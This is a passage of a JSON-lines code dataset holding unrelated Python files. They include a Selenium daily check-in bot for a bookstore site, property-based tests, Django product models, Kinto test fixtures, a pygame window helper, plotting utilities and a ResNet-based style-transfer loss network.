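def repeated_holdout(make_classifier, X, y, runs=10, test_size=0.33):
    # average test accuracy over `runs` independent shuffled splits
    scores = []
    for _ in range(runs):
        X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=test_size)
        clf = make_classifier()  # fresh model each run, e.g. make_classifier=C45
        clf.fit(X_tr, y_tr)
        scores.append(accuracy_score(y_te, clf.predict(X_te)))
    return sum(scores) / len(scores)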
\n# Set up headless Firefox and open kyobobook.co.kr\noptions = Options()\noptions.headless = True\nbrowser = Firefox(options=options, executable_path=driver_path)\nbrowser.get('http://www.kyobobook.co.kr/index.laf')\nprint('connected to kyobobook.co.kr')\n\n# Bypass the popup on the first screen\n# print(browser.window_handles)\nbrowser.switch_to.window(browser.window_handles[0])\nprint('popup bypassed')\n\n# login\nbrowser.find_elements_by_css_selector('#gnbLoginInfoList > li')[0].click()\nbrowser.find_element_by_id('memid').send_keys(kyobo_id)\nbrowser.find_element_by_id('pw').send_keys(kyobo_pw)\nbrowser.find_element_by_class_name('btn_submit').click()\nprint('login')\n\n# Bypass the popup after login\nbrowser.switch_to.window(browser.window_handles[0])\ntime.sleep(1)\nbrowser.find_elements_by_css_selector('#gnbLoginInfoList > li')[2].click()\n\n# An alert appears on the first check-in of the day: accept it\ntry:\n    browser.switch_to.alert.accept()\n    print('check')\nexcept NoAlertPresentException:\n    print('already checked')\n\ntime.sleep(1)\n# Click the sentence-collection stamp\nif browser.find_elements_by_css_selector('.list_books_kp > li:nth-child(2)'):\n    browser.find_elements_by_css_selector('.list_books_kp > li:nth-child(2)')[0].click()\n    browser.find_elements_by_css_selector('.btn_stamp_check')[0].click()\n    print('sentence collection')\n\n\ntry:\n    browser.switch_to.alert.accept()\n    print('sentence collection: correct answer')\nexcept NoAlertPresentException:\n    print('sentence collection: done')\n\ntime.sleep(1)\nhtml_source = browser.page_source\n\n# Current number of checked-in days\nsoup = BeautifulSoup(html_source, 'html.parser')\nul = soup.select('.daily_stamp_list')\nchecked_day = ul[0].select('.on')+ul[0].select('.complete')\n\nfor day in checked_day:\n    print(day.text)\n\n# If every day is checked in, enter the draw for the 2000 KRW voucher\nif len(ul) == len(checked_day):\n    print('all check!')\n    browser.find_element_by_css_selector('.benefits_stamp>li:last-child').click()\n\n# Close the windows one by one, popups first\ncnt = len(browser.window_handles)\nfor i in range(cnt, 0, -1):\n    browser.switch_to.window(browser.window_handles[i-1])\n    browser.close()\n    time.sleep(0.5)\nprint('Checked in', str(len(checked_day)), 'days in total.')\n\n# Quit the driver left in memory\nbrowser.quit()\n","sub_path":"Workspaces09_Python/Python02/crawling/kyobo/kyobo.py","file_name":"kyobo.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"129400218","text":"import math\nfrom typing import Tuple\n\nfrom hypothesis import assume, given\nfrom hypothesis.strategies import floats, tuples\n\nfrom utilities.scalers import apply_deadzone, map_exponential, scale_value\n\n\n@given(value=floats(-1, 1), threshold=floats(0, 1, exclude_max=True))\ndef test_deadzone(value, threshold):\n    result = apply_deadzone(value, threshold)\n    assert abs(result) <= 1\n    if value == 0:\n        assert result == 0\n    elif not math.isclose(value, 0, abs_tol=threshold):\n        assert math.copysign(1, result) == math.copysign(1, value)\n\n\n@given(value=floats(-1, 1), base=floats(1, exclude_min=True, allow_infinity=False))\ndef test_exponential(value, base):\n    result = map_exponential(value, base)\n    assert abs(result) <= 1\n    if value == 0:\n        assert result == 0\n    else:\n        assert math.copysign(1, result) == math.copysign(1, value)\n\n\nreal_halves = floats(allow_nan=False, allow_infinity=False, width=16)\n\n\n@given(\n    value=real_halves,\n    input_range=tuples(real_halves, real_halves).filter(lambda x: x[0] != x[1]),\n    output_range=tuples(real_halves, real_halves)\n    .map(sorted)\n    .filter(lambda x: x[0] < x[1]),\n)\ndef test_scale_value(\n    value: float,\n    input_range: Tuple[float, float],\n    output_range: Tuple[float, float],\n):\n    input_lower, input_upper = input_range\n    output_lower, 
output_upper = output_range\n assume(min(input_lower, input_upper) <= value <= max(input_lower, input_upper))\n result = scale_value(value, input_lower, input_upper, output_lower, output_upper)\n assert output_lower <= result <= output_upper\n","sub_path":"tests/test_scalers.py","file_name":"test_scalers.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"438976128","text":"from cms.models.pluginmodel import CMSPlugin\nfrom cms.models.fields import models\n\n\nclass Category(models.Model):\n title = models.CharField(max_length=250, verbose_name='Наименование')\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n def __repr__(self):\n return self.title\n\n def __str__(self):\n return self.title\n\n\nclass SubCategory(models.Model):\n title = models.CharField(max_length=250, verbose_name='Подкатегория')\n\n class Meta:\n verbose_name = 'Подкадегория'\n verbose_name_plural = 'Подкадегории'\n\n def __repr__(self):\n return self.title\n\n def __str__(self):\n return self.title\n\n\nclass Product(models.Model):\n category = models.ForeignKey(\n Category, on_delete=models.PROTECT,\n verbose_name='Категория')\n\n sub_category = models.ForeignKey(\n SubCategory, on_delete=models.PROTECT,\n verbose_name='Подкатегория')\n\n code = models.IntegerField(verbose_name='Код')\n name = models.CharField(max_length=150, verbose_name='Наименование')\n unit = models.CharField(max_length=50, verbose_name='Осн. ед изм.')\n full_name = models.CharField(max_length=120, verbose_name='Полное наименование')\n nds = models.CharField(max_length=20, verbose_name='Ставка НДС')\n\n remains = models.FloatField(\n null=True, blank=True,\n verbose_name='Остаток')\n\n price = models.FloatField(\n null=True, blank=True,\n verbose_name='Цена')\n\n reserve_on_firm = models.FloatField(\n null=True, blank=True,\n verbose_name='Резерв по фирме')\n\n remains_fact = models.FloatField(\n null=True, blank=True,\n verbose_name='Остаток факт.')\n\n val = models.TextField(\n null=True, blank=True,\n verbose_name='Вал')\n\n purchase = models.FloatField(\n null=True, blank=True,\n verbose_name='Закупка')\n\n country_of_origin = models.CharField(\n max_length=120, null=True, blank=True,\n verbose_name='Страна происхождения')\n\n gdt_number = models.CharField(\n max_length=50, null=True, blank=True,\n verbose_name='Номер ГДТ')\n\n storage_life = models.CharField(\n max_length=150, null=True, blank=True,\n verbose_name='Срок хранения')\n\n storage_conditions = models.TextField(\n null=True, blank=True,\n verbose_name='Условия хранения')\n\n cert_of_conformity = models.CharField(\n max_length=250, null=True, blank=True,\n verbose_name='Сертификат соответствия')\n\n gost_ty = models.TextField(\n null=True, blank=True,\n verbose_name='Нормативно технический документ (ГОСТ, ТУ)')\n\n basic_property = models.TextField(\n null=True, blank=True,\n verbose_name='Основное свойство')\n\n print_name = models.CharField(\n max_length=150, null=True, blank=True,\n verbose_name='Наименование для печати')\n\n articule = models.TextField(\n null=True, blank=True,\n verbose_name='Артикул')\n\n edizm_base = models.CharField(\n max_length=200, null=True, blank=True,\n verbose_name='Базовая ед изм.')\n\n base_weight = models.CharField(\n max_length=250, null=True, blank=True,\n verbose_name='Вес Базовый (кг)')\n\n base_barcode = models.TextField(\n null=True, blank=True,\n verbose_name='Штрихкод базовый')\n\n class Meta:\n verbose_name = 
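The property-based test above pins down scale_value's contract: a linear map from input_range onto output_range whose result stays within the output bounds. The utilities.scalers module is not included in this record; a plausible implementation satisfying the tested property might look like this:

def scale_value(value, input_lower, input_upper, output_lower, output_upper):
    # linearly map `value` from [input_lower, input_upper] onto [output_lower, output_upper]
    fraction = (value - input_lower) / (input_upper - input_lower)
    return output_lower + fraction * (output_upper - output_lower)

assert scale_value(0.5, 0.0, 1.0, 0.0, 10.0) == 5.0
assert scale_value(-1.0, -1.0, 1.0, 0.0, 1.0) == 0.0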
'Номенклатуру'\n verbose_name_plural = 'Номенклатура'\n ordering = ('name', 'remains',)\n\n def __repr__(self):\n return self.name\n\n def __str__(self):\n return self.name\n","sub_path":"apps/djangocms_apps/catalog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"32703230","text":"try:\n import unittest2 as unittest\nexcept ImportError:\n import unittest # NOQA\n\nimport webtest\nfrom kinto.core import utils\nfrom kinto.tests.core import support as core_support\nfrom kinto import main as testapp\nfrom kinto import DEFAULT_SETTINGS\n\n\nMINIMALIST_BUCKET = {}\nMINIMALIST_COLLECTION = {}\nMINIMALIST_GROUP = {'data': dict(members=['fxa:user'])}\nMINIMALIST_RECORD = {'data': dict(name=\"Hulled Barley\",\n type=\"Whole Grain\")}\nUSER_PRINCIPAL = 'basicauth:3a0c56d278def4113f38d0cfff6db1b06b84fcc4384ee890' \\\n 'cf7bbaa772317e10'\n\n\nclass BaseWebTest(object):\n\n def __init__(self, *args, **kwargs):\n super(BaseWebTest, self).__init__(*args, **kwargs)\n self.principal = USER_PRINCIPAL\n self.app = self._get_test_app()\n self.storage = self.app.app.registry.storage\n self.permission = self.app.app.registry.permission\n self.cache = self.app.app.registry.cache\n self.storage.initialize_schema()\n self.permission.initialize_schema()\n self.cache.initialize_schema()\n self.headers = {\n 'Content-Type': 'application/json',\n }\n self.headers.update(get_user_headers('mat'))\n\n def _get_test_app(self, settings=None):\n app = webtest.TestApp(testapp({}, **self.get_app_settings(settings)))\n app.RequestClass = core_support.get_request_class(prefix=\"v1\")\n return app\n\n def get_app_settings(self, additional_settings=None):\n settings = core_support.DEFAULT_SETTINGS.copy()\n settings.update(**DEFAULT_SETTINGS)\n settings['cache_backend'] = 'kinto.core.cache.memory'\n settings['storage_backend'] = 'kinto.core.storage.memory'\n settings['permission_backend'] = 'kinto.core.permission.memory'\n settings['userid_hmac_secret'] = \"this is not a secret\"\n settings['includes'] = \"kinto.plugins.default_bucket\"\n\n if additional_settings is not None:\n settings.update(additional_settings)\n return settings\n\n def tearDown(self):\n super(BaseWebTest, self).tearDown()\n self.storage.flush()\n self.cache.flush()\n self.permission.flush()\n\n def create_group(self, bucket_id, group_id, members=None):\n if members is None:\n group = MINIMALIST_GROUP\n else:\n group = {'data': {'members': members}}\n group_url = '/buckets/%s/groups/%s' % (bucket_id, group_id)\n self.app.put_json(group_url, group,\n headers=self.headers, status=201)\n\n def create_bucket(self, bucket_id):\n self.app.put_json('/buckets/%s' % bucket_id, MINIMALIST_BUCKET,\n headers=self.headers, status=201)\n\n\ndef get_user_headers(user):\n credentials = \"%s:secret\" % user\n authorization = 'Basic {0}'.format(utils.encode64(credentials))\n return {\n 'Authorization': authorization\n }\n","sub_path":"kinto/tests/support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"611434499","text":"'''Faça um programa que leia um número qualquer e mostre o seu fatorial.\n\nex:\n5! = 5x4x3x2x1= 120'''\n\n'''count = 1\nnum = int(input('Digite um número inteiro para descobir o seu fatorial: '))\nprint('{}! 
= {}x'.format(num, num), end='')\nwhile count < num:\n n_num = num\n for c in range(num-1,0,-1):\n n_num = n_num * c\n print('{}x'.format(c), end='')\n count += 1\nprint('={}'.format(n_num))'''\n\n'''from math import factorial\nn = int(input('Digite um número para calcular seu fatorial: '))\nf = factorial(n)\nprint('O fatorial de {} é {}'.format(n, f))'''\n\n\nnum = int(input('Digite um número inteiro para descobir o seu fatorial: '))\nc = num\nf = 1\nprint('{}! = '.format(num), end='')\nwhile c > 0:\n print('{}'.format(c), end='')\n print(' x ' if c > 1 else ' = ', end='')\n f *= c\n c -= 1\nprint('{}'.format(f))\n\n","sub_path":"Desafio060.py","file_name":"Desafio060.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"628097332","text":"from __future__ import division\n\nfrom mycolors import *\n\nimport pygame\nfrom pygame.locals import *\nimport time\nimport json\n\n\n\nclass Window:\n made=0\n\n def __init__(self,name=\"Unnamed\",size=None,text_font=\"monospace\",text_size=65,text_color=WHITE,background_color=BLACK,fullscreen=False,build=True):\n \"\"\"Create a window object using name, size text_font, text_size, text_color, background and set.\"\"\"\n Window.made+=1\n self.number=Window.made\n self.name=name\n self.size=size\n self.text_font=text_font\n self.text_size=text_size\n self.text_color=text_color\n self.background_color=background_color\n self.fullscreen=fullscreen\n self.set()\n self.log(\"Window has been created.\")\n if build:\n self.build()\n\n def set(self):\n \"\"\"Set builtins attributs of window object.\"\"\"\n self.RIGHT = 0\n self.UP = 1\n self.LEFT = 2\n self.DOWN = 3\n self.selecter_color=self.reverseColor(self.background_color)\n self.open=False\n self.screenshots_taken=0\n self.pause_cool_down=1\n self.time=time.time()\n self.pause_time=0.2\n\n def build(self):\n \"\"\"Creates apparent window.\"\"\"\n pygame.init()\n self.info = pygame.display.Info()\n self.font = pygame.font.SysFont(self.text_font, self.text_size)\n if self.size is None:\n if self.fullscreen:\n self.size=[self.info.current_w,self.info.current_h]\n else:\n self.size=[2*self.info.current_w//3,2*self.info.current_h//3]\n self.coordonnates=[0,0]+self.size\n if self.fullscreen:\n self.screen=pygame.display.set_mode(self.size,FULLSCREEN)\n else:\n self.screen=pygame.display.set_mode(self.size,RESIZABLE)\n pygame.display.set_caption(self.name)\n if self.text_color is None:\n self.text_color=self.reverseColor(self.background_color)\n self.clear()\n self.flip()\n self.open=True\n\n def clear(self,color=None):\n \"\"\"Clear to background color.\"\"\"\n if color is None:\n color=self.background_color\n self.screen.fill(color)\n\n def scale(self,picture,size):\n \"\"\"Return scaled picture using picture and size.\"\"\"\n return pygame.transform.scale(picture,size)\n\n def check(self):\n \"\"\"Update window's state depending if close buttons are pressed.\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.open=False\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n self.open=False\n\n def update(self):\n \"\"\"Updates all window's main attributs.\"\"\"\n self.mouse_click=bool(pygame.mouse.get_pressed()[0])\n self.mouse_position=pygame.mouse.get_pos()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.open=False\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n self.open=False\n\n def pause(self):\n \"\"\"Wait for user to click on space.\"\"\"\n 
while self.open:\n            self.check()\n            keys=pygame.key.get_pressed()\n            if keys[K_SPACE]:\n                break\n        if self.open:\n            time.sleep(self.pause_time)\n\n    def press(self):\n        \"\"\"Return the state of all keys.\"\"\"\n        return pygame.key.get_pressed()\n\n    def direction(self):\n        \"\"\"Return keys for arrows pressed. Trigonometric orientation is used.\"\"\"\n        keys=pygame.key.get_pressed()\n        return (keys[K_RIGHT],keys[K_UP],keys[K_LEFT],keys[K_DOWN])\n\n\n    def select(self):\n        \"\"\"Wait for user to click on screen, then return cursor position.\"\"\"\n        while self.open:\n            self.check()\n            for event in pygame.event.get():\n                if event.type == MOUSEBUTTONDOWN and event.button == 1:\n                    return (event.pos[0],event.pos[1])\n\n    def point(self):\n        \"\"\"Return cursor position on screen.\"\"\"\n        return pygame.mouse.get_pos()\n\n    def click(self):\n        \"\"\"Return bool value for clicking on screen.\"\"\"\n        return bool(pygame.mouse.get_pressed()[0])\n\n    def flip(self):\n        \"\"\"Refresh screen.\"\"\"\n        pygame.display.flip()\n\n    def screenshot(self):\n        \"\"\"Save a picture of the surface.\"\"\"\n        self.screenshots_taken+=1\n        pygame.image.save(self.screen,self.name+\"-\"+str(self.screenshots_taken)+\".png\")\n\n\n    def getPicture(self,picture_directory):\n        \"\"\"Return picture using picture directory.\"\"\"\n        return pygame.image.load(picture_directory)\n\n    def placePicture(self,picture_directory,coordonnates,color=None):\n        \"\"\"Draw a picture on screen using picture directory and coordonnates.\"\"\"\n        x,y,sx,sy=coordonnates\n        picture=pygame.image.load(picture_directory)\n        picture=pygame.transform.scale(picture,(sx,sy))\n        if color is not None:\n            picture=self.colorize(picture,color)\n        self.screen.blit(picture,(x,y))\n\n    def centerText(self,message,size=None):\n        \"\"\"Return the position that centers the text on screen.\"\"\"\n        sx,sy=self.size\n        if size is None:\n            size=self.text_size\n        l=len(message)\n        letter_size=size/4\n        x=sx//2-letter_size*l//2\n        y=sy//2-size/3\n        return (x,y)\n\n    def alert(self,message):\n        \"\"\"Quickly display text on window.\"\"\"\n        position=self.centerText(message)\n        self.print(message,position)\n        self.flip()\n\n    def print(self,text,position,size=None,color=None,font=None):\n        \"\"\"Display text on screen using position, size, color and font.\"\"\"\n        if size is None:\n            size=self.text_size\n        if color is None:\n            color=self.text_color\n        if font is None:\n            font=self.font\n        label = font.render(text, 1, color)\n        self.screen.blit(label, position)\n\n    def drawRect(self,coordonnates,color):\n        \"\"\"Draw a rectangle on the screen using color and coordonnates relative to window's fiducials.\"\"\"\n        wsx,wsy=self.size\n        wcx,wcy,wcsx,wcsy=self.coordonnates\n        rcx,rcy,rcsx,rcsy=coordonnates\n        x,y=(rcx-wcx,rcy-wcy)\n        w,h=(rcsx*wsx/wcsx,rcsy*wsy/wcsy)\n        pygame.draw.rect(self.screen,color,(x,y,w,h),0)\n\n    def place(self,position):\n        \"\"\"Return position relative to window's fiducials.\"\"\"\n        wcx,wcy,wcsx,wcsy=self.coordonnates\n        pcx,pcy=position\n        x,y=(pcx-wcx,pcy-wcy)\n        return (x,y)\n\n\n    def randomColor(self):\n        \"\"\"Return random color.\"\"\"\n        import random\n        r=random.randint(0,255)\n        g=random.randint(0,255)\n        b=random.randint(0,255)\n        color=(r,g,b)\n        return color\n\n    def reverseColor(self,color):\n        \"\"\"Return reverse color.\"\"\"\n        r,g,b=color\n        r=255-r\n        g=255-g\n        b=255-b\n        color=(r,g,b)\n        return color\n\n    def lighten(self,color,luminosity=80): #View later\n        \"\"\"Return lightened color using color and luminosity percentage.\"\"\"\n        r,g,b=color\n        if 
luminosity>=50:\n r+=(255-r)*luminosity/100\n g+=(255-g)*luminosity/100\n b+=(255-b)*luminosity/100\n else:\n r-=r*luminosity/100\n g-=g*luminosity/100\n b-=b*luminosity/100\n color=r,g,b\n return color\n\n def colorize(self,image, color):\n \"\"\"Return image colorized\"\"\"\n image = image.copy()\n image.fill((0,0,0,255),None,pygame.BLEND_RGBA_MULT)\n image.fill(color[0:3]+(0,),None,pygame.BLEND_RGBA_ADD)\n return image\n\n\n\n def wavelengthToRGB(self,wavelength):\n \"\"\"Convert wavelength to rgb color type.\"\"\"\n gamma,max_intensity=0.80,255\n def adjust(color, factor):\n if color==0: return 0\n else: return round(max_intensity*pow(color*factor,gamma))\n if 380<=wavelength<=440: r,g,b=-(wavelength-440)/(440-380),0,1\n elif 440<=wavelength<=490: r,g,b=0,(wavelength-440)/(490-440),1\n elif 490<=wavelength<=510: r,g,b=0,1,-(wavelength-510)/(510-490)\n elif 510<=wavelength<=580: r,g,b=(wavelength-510)/(580-510),1,0\n elif 580<=wavelength<=645: r,g,b=1,-(wavelength-645)/(645-580),0\n elif 645<=wavelength<=780: r,g,b=1,0,0\n else: r,g,b=0,0,0\n if 380<=wavelength<=420: factor=0.3+0.7*(wavelength-380)/(420-380)\n elif 420<=wavelength<=701: factor=1\n elif 701<=wavelength<=780: factor=0.3+0.7*(780-wavelength)/(780-700)\n else: factor=0\n r,g,b=adjust(r,factor),adjust(g,factor),adjust(b,factor)\n return (r,g,b)\n\n def kill(self):\n \"\"\"Quit pygame.\"\"\"\n pygame.quit()\n\n def log(self,message):\n \"\"\"Print message with window mention.\"\"\"\n text=\"[\"+self.name+\"] \"+message\n print(text)\n\n def __del__(self):\n \"\"\"Executed before the window is destroyed.\"\"\"\n self.log(\"Window has been closed.\")\n\n\n\n\n\n\n\nif __name__==\"__main__\":\n w=Window(\"Window Prototype\")\n #save(w,\"grosse fenetre\")\n #w=load(\"grosse fenetre\")\n #print(w.lighten(BLUE))\n #w.alert(\"test\")\n w.pause()\n w.clear()\n w.alert(\"je raconte de la merde juste pour avoir une longue chaine de caractere\")\n w.pause()\n w.kill()\n","sub_path":"mywindow.py","file_name":"mywindow.py","file_ext":"py","file_size_in_byte":9421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"55077714","text":"\"\"\"\n\n@author: Patrik Purgai\n@copyright: Copyright 2018, MiniFlow\n@license: MIT\n@email: purgai.patrik@gmail.com\n@date: 2018.08.17.\n\"\"\"\n\nimport seaborn as sns\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\n\n\ndef plot_scatter_2d(data):\n assert data.shape[1] == 2, 'Data must be 2 dimensional.'\n sns.heatmap(data, )\n\n\ndef plot_scatter_3d(data):\n raise NotImplementedError()\n\n\ndef plot_confusion_matrix(predictions, labels,\n classes=None, num_classes=None):\n \"\"\"Plots a confusion matrix from the provided labels and predictions.\"\"\"\n matrix = tf.confusion_matrix(\n predictions=predictions,\n labels=labels,\n num_classes=num_classes)\n matrix = matrix.numpy()\n if classes is not None:\n matrix = pd.DataFrame(data=matrix, columns=classes, index=classes)\n sns.heatmap(matrix)\n plt.show()\n\n\ndef plot_images_with_prediction(images, labels, predictions,\n ncols, nrows, classes=None):\n \"\"\"Plots images with labels and predictions.\"\"\"\n fig, ax = plt.subplots(ncols=ncols, nrows=nrows,\n figsize=(ncols * 2, nrows * 2))\n for i in range(len(images)):\n ax_i = ax.ravel()[i]\n if len(images[i].shape) == 2:\n ax_i.imshow(images[i].astype(np.uint8), cmap='Greys')\n else:\n ax_i.imshow(images[i].astype(np.uint8))\n prediction = predictions[i]\n label = labels[i]\n if classes 
is not None:\n prediction = classes[prediction]\n label = classes[label]\n\n ax_i.set_title(\n 'target: {} \\npred: {}'.format(label, prediction))\n ax_i.set_axis_off()\n\n plt.tight_layout()\n plt.show()\n\n\ndef plot_images(images, ncols, nrows):\n \"\"\"Plots images with labels and predictions.\"\"\"\n if len(images) > 10:\n images = random.sample(images, 10)\n nrows = 10\n\n fig, ax = plt.subplots(ncols=ncols, nrows=nrows,\n figsize=(ncols * 2, nrows * 2))\n\n for i in range(len(images)):\n for j in range(len(images[i])):\n ax_i = ax.ravel()[i * ncols + j]\n if len(images[i][j].shape) == 2:\n ax_i.imshow(images[i][j].astype(np.uint8), cmap='Greys')\n else:\n ax_i.imshow(images[i][j].astype(np.uint8))\n\n ax_i.set_axis_off()\n\n plt.tight_layout()\n plt.show()\n","sub_path":"experiments/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"39321806","text":"\"\"\"\nThe :mod:`pyspark_config.transformations` module includes dataclasses,\nmethods and transformation to transform the spark dataframes in a robust and\nconfigured manner.\n\"\"\"\n\nfrom .transformations import *\n\n__all__ = [\n 'Transformation',\n 'Base64',\n 'Cast',\n 'CollectList',\n 'Concatenate',\n 'DayOfMonth',\n 'DayOfWeek',\n 'DayOfYear',\n 'Filter',\n 'FilterByList',\n 'GroupBy',\n 'ListLength',\n 'Month',\n 'Normalization',\n 'Percentage',\n 'Select',\n 'SortBy',\n 'Split',\n 'Year'\n]","sub_path":"pyspark_config/transformations/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"97645744","text":"n = int(input())\nprint(\"Give me a number r that is LESS THAN the number n\")\nr = int(input())\n\n\ndef nCr(n, r):\n\n def factorial(p):\n fact = 1\n for i in range(1, p + 1):\n fact = fact*i\n return(fact)\n return((factorial(n)) / (factorial(r) * factorial(n-r)))\n\ny = nCr(n, r)\nprint(y)\n","sub_path":"Combinations(no import).py","file_name":"Combinations(no import).py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"41560254","text":"from collections import namedtuple\nimport time\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\n# For getting VGG model\nimport torchvision.models.vgg as vgg\nimport torch.utils.model_zoo as model_zoo\n# Image transformation pipeline\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torch.optim import Adam\nfrom torch.autograd import Variable\nfrom PIL import Image\nfrom tqdm import tqdm_notebook\nfrom torchvision import transforms, models\nfrom transformer_net import TransformerNet\nfrom utils import gram_matrix, recover_image, tensor_normalizer\nimport os\nfrom PIL import ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\ngpu = '3'\ngpu = gpu.split(',')\nos.environ['CUDA_VISIBLE_DEVICES'] = ','.join(gpu)\nos.environ['QT_QPA_PLATFORM']='offscreen'\n\n\n\n# SEED = 1080\n# np.random.seed(SEED)\n# torch.manual_seed(SEED)\n# if torch.cuda.is_available():\n# torch.cuda.manual_seed(SEED)\n# torch.set_default_tensor_type('torch.cuda.FloatTensor')\n# kwargs = {'num_workers': 4, 'pin_memory': True}\n# else:\n# torch.set_default_tensor_type('torch.FloatTensor')\n# kwargs = {}\nkwargs = {'num_workers': 4, 'pin_memory': True}\n\nIMAGE_SIZE = 
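The nCr record above builds the binomial coefficient from three factorials; since Python 3.8 the standard library computes it directly with math.comb, and math.factorial replaces the hand-rolled loop on older versions. A sketch:

import math

def ncr(n: int, r: int) -> int:
    return math.comb(n, r)  # Python >= 3.8

assert ncr(5, 2) == 10 == math.factorial(5) // (math.factorial(2) * math.factorial(3))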
256\nBATCH_SIZE = 4\nDATASET = \"./coco/\"\ntransform = transforms.Compose([transforms.Resize((IMAGE_SIZE, IMAGE_SIZE)),\n transforms.CenterCrop(IMAGE_SIZE),\n transforms.ToTensor(),\n tensor_normalizer()])\n# http://pytorch.org/docs/master/torchvision/datasets.html#imagefolder\ntrain_dataset = datasets.ImageFolder(DATASET, transform)\n# http://pytorch.org/docs/master/data.html#torch.utils.data.DataLoader\ntrain_loader = DataLoader(train_dataset, batch_size=BATCH_SIZE, shuffle=True, **kwargs)\n\n\n# LossOutput = namedtuple(\"LossOutput\", [\"conv2_0\", \"conv2_1\", \"conv2_2\", \"conv2_3\"])\n#\n#\n# # https://discuss.pytorch.org/t/how-to-extract-features-of-an-image-from-a-trained-model/119/3\n# class LossNetwork(torch.nn.Module):\n# def __init__(self, resnet_model):\n# super(LossNetwork, self).__init__()\n# self.model = resnet_model\n# self.layers1 = {'2': 'conv1_2'}\n# self.layers2 = {'0': 'conv2_0',\n# '1': 'conv2_1',\n# '2': 'conv2_2',\n# '3': 'conv2_3'\n# }\n# self.layers3 = {'5': 'conv3_5'}\n# self.layers4 = {'2': 'conv4_2'}\n#\n#\n# def forward(self, x):\n# output = {}\n# x = self.model.conv1(x)\n# x = self.model.bn1(x)\n# x = self.model.relu(x)\n# x = self.model.maxpool(x)\n#\n# for name, layer in enumerate(self.model.layer1):\n# x = layer(x)\n# for name, layer in enumerate(self.model.layer2):\n# x = layer(x)\n# if str(name) in self.layers2:\n# output[self.layers2[str(name)]] = x\n# for name, layer in enumerate(self.model.layer3):\n# x = layer(x)\n# for name, layer in enumerate(self.model.layer4):\n# x = layer(x)\n#\n# return LossOutput(**output)\n\n\nLossOutput = namedtuple(\"LossOutput\", [\"conv0_0\", \"conv1_2\", \"conv2_3\", \"conv3_5\", \"conv4_2\"])\n\n\n# https://discuss.pytorch.org/t/how-to-extract-features-of-an-image-from-a-trained-model/119/3\nclass LossNetwork(torch.nn.Module):\n def __init__(self, resnet_model):\n super(LossNetwork, self).__init__()\n self.model = resnet_model\n self.layers1 = {'2': 'conv1_2'}\n self.layers2 = {'3': 'conv2_3'}\n self.layers3 = {'5': 'conv3_5'}\n self.layers4 = {'2': 'conv4_2'}\n\n\n def forward(self, x):\n output = {}\n x = self.model.conv1(x)\n x = self.model.bn1(x)\n x = self.model.relu(x)\n output['conv0_0'] = x\n x = self.model.maxpool(x)\n\n for name, layer in enumerate(self.model.layer1):\n x = layer(x)\n if str(name) in self.layers1:\n output[self.layers1[str(name)]] = x\n for name, layer in enumerate(self.model.layer2):\n x = layer(x)\n if str(name) in self.layers2:\n output[self.layers2[str(name)]] = x\n for name, layer in enumerate(self.model.layer3):\n x = layer(x)\n if str(name) in self.layers3:\n output[self.layers3[str(name)]] = x\n for name, layer in enumerate(self.model.layer4):\n x = layer(x)\n if str(name) in self.layers4:\n output[self.layers4[str(name)]] = x\n\n return LossOutput(**output)\n\n\n# class LossNetwork(torch.nn.Module):\n# def __init__(self, vgg_model):\n# super(LossNetwork, self).__init__()\n# self.vgg_layers = vgg_model.features\n# self.layer_name_mapping = {\n# '3': \"relu1_2\",\n# '8': \"relu2_2\",\n# '15': \"relu3_3\",\n# '22': \"relu4_3\"\n# }\n#\n# def forward(self, x):\n# output = {}\n# for name, module in self.vgg_layers._modules.items():\n# x = module(x)\n# if name in self.layer_name_mapping:\n# output[self.layer_name_mapping[name]] = x\n# return LossOutput(**output)\n\n\n\nresnet_model = models.resnet50(pretrained=True)\nif torch.cuda.is_available():\n resnet_model.cuda()\nloss_network = LossNetwork(resnet_model)\nloss_network.eval()\n\nARCHITECTURE = 'resnet50'\nSTYLE_FIELD = 
